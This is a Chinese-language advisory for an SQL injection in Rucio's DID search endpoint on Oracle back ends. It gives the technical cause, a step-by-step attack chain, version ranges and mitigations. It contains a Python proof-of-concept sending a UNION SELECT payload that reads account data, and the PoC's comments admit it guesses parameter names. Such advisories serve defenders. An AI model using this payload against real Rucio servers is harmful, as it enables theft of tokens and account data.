CVE-2026-29080 Rucio SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-29080

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Rucio

漏洞概述

Rucio是一个分布式数据管理系统，其FilterEngine组件中的create_sqla_query方法存在严重SQL注入漏洞。在Oracle数据库部署环境下，由于代码直接使用Python的.format()方法将用户输入拼接至sqlalchemy.text()函数中，导致完全绕过了参数化查询保护。任何经过身份认证的Rucio用户均可利用DID搜索端点注入恶意SQL语句，进而执行任意数据库命令。此漏洞可能导致攻击者窃取认证令牌、密码哈希及所有管理数据，甚至修改数据库内容，造成严重的数据泄露和完整性破坏。该问题仅影响使用默认json_meta插件的Oracle部署环境，PostgreSQL和MySQL不受影响。

技术细节

漏洞根源位于文件lib/rucio/core/did_meta_plugins/filter_engine.py的create_sqla_query()方法。当Rucio后端数据库方言被检测为Oracle时，系统在构建JSON元数据列的过滤表达式时存在逻辑缺陷。开发者错误地利用sqlalchemy.text()函数配合Python字符串格式化（.format()）来动态生成SQL查询片段。具体而言，从HTTP查询参数中提取的key和value字段未经过充分的安全过滤，直接被插入到SQL语句结构中。由于sqlalchemy.text()本身不具备转义或参数化功能，攻击者可以通过构造特殊的HTTP请求，在GET /dids/<scope>/dids/search端点注入任意SQL语法。利用此漏洞，攻击者不仅能绕过认证机制读取敏感表（如identities, tokens, accounts），还能通过UNION查询或堆叠查询获取数据库中的所有数据标识符。值得注意的是，该漏洞具有特定的环境依赖性，仅针对Oracle数据库且启用了默认json_meta插件的场景。

攻击链分析

STEP 1

侦察

攻击者识别目标为Rucio数据管理系统，并确认其后端数据库为Oracle（通过错误信息或行为特征判断）。

STEP 2

获取凭证

由于漏洞需要身份认证（PR:L），攻击者通过钓鱼、社会工程学或利用其他低危漏洞获取一个有效的Rucio用户账户或API Token。

STEP 3

漏洞利用

攻击者向`GET /dids/<scope>/dids/search`端点发送特制的HTTP请求。在查询参数中注入恶意SQL代码，利用Python字符串格式化缺陷绕过sqlalchemy的安全机制。

STEP 4

数据窃取

利用SQL注入漏洞，攻击者执行UNION SELECT或其他SQL命令，从数据库中提取敏感信息，如用户凭证、认证令牌和数据标识符。

STEP 5

权限提升与持久化

根据数据库权限，攻击者可能进一步修改账户密码、插入恶意数据或破坏数据完整性，从而完全控制Rucio管理的资源。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-29080 (Rucio SQL Injection)
Target: Rucio instances running on Oracle DB.
Description: Exploits the lack of parameterization in FilterEngine.create_sqla_query().
"""

import requests

# Configuration
TARGET_HOST = "http://vulnerable-rucio-instance:8080"
SCOPE = "test"  # Valid scope is required
AUTH_TOKEN = "<VALID_RUCIO_AUTH_TOKEN>"  # Need authentication (PR:L)

# The vulnerability is in the DID search endpoint.
# The 'key' and 'value' parameters in the filter are interpolated via .format()
# into sqlalchemy.text().
# Payload attempts a simple boolean-based blind injection or UNION based.

# Example Payload: ' OR 1=1--  (This might alter the query logic)
# For Oracle, we might try: ' UNION SELECT NULL, username, password FROM accounts-- 

malicious_filter = {
    # The parameter names might vary based on implementation, 
    # typically passed as query params for filtering.
    # Assuming the endpoint parsesJSON or query params for 'key' and 'value'.
    "key": "test_key", 
    "value": "test_value' UNION SELECT NULL, account, email FROM accounts-- "
}

url = f"{TARGET_HOST}/dids/{SCOPE}/dids/search"
headers = {
    "X-Rucio-Auth-Token": AUTH_TOKEN,
    "Accept": "application/json"
}

try:
    print(f"Sending request to {url}...")
    response = requests.get(url, headers=headers, params=malicious_filter, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request successful!")
        print("[+] Response body:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)

except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

影响范围

Rucio >= 1.27.0, < 35.8.5

Rucio >= 35.8.5, < 38.5.5

Rucio >= 38.5.5, < 39.4.2

Rucio >= 39.4.2, < 40.1.1

防御指南

临时缓解措施

如果无法立即升级，建议严格限制对`/dids/<scope>/dids/search`接口的网络访问，仅允许受信任的内部IP调用。同时，部署Web应用防火墙（WAF）规则以拦截针对该端点的常见SQL注入攻击模式。对于Oracle数据库用户，可考虑暂时禁用受影响的JSON元数据搜索功能作为临时规避方案。